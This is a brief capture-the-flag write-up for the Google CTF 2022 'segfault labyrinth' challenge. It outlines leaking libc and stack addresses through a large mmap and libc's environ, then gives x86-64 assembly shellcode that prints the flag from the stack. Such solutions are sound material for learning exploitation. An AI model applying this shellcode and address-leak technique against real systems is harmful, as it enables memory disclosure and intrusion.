TL;DR

Mmap large chunk to get libc address

libc environment to get stack address

use flag reference on stack to print out the flag

// mmap large chunk to get libc
mov rax, 9
mov rdi, 0
mov rsi, 0x100000
mov rdx, 0x7
mov r10, 0x22
mov r8,  -1
mov r9,  0
syscall

//get stack from libc environ
add rax, 0x2ef600
mov rsp, [rax]

//print flag
mov rax, 1
mov rdi, 1
mov rdx, 0x100
mov rsi, [rsp-0x240]
syscall

Original writeup (https://bronson113.github.io/2022/07/05/segfault-labyrinth-GoogleCTF2022.html).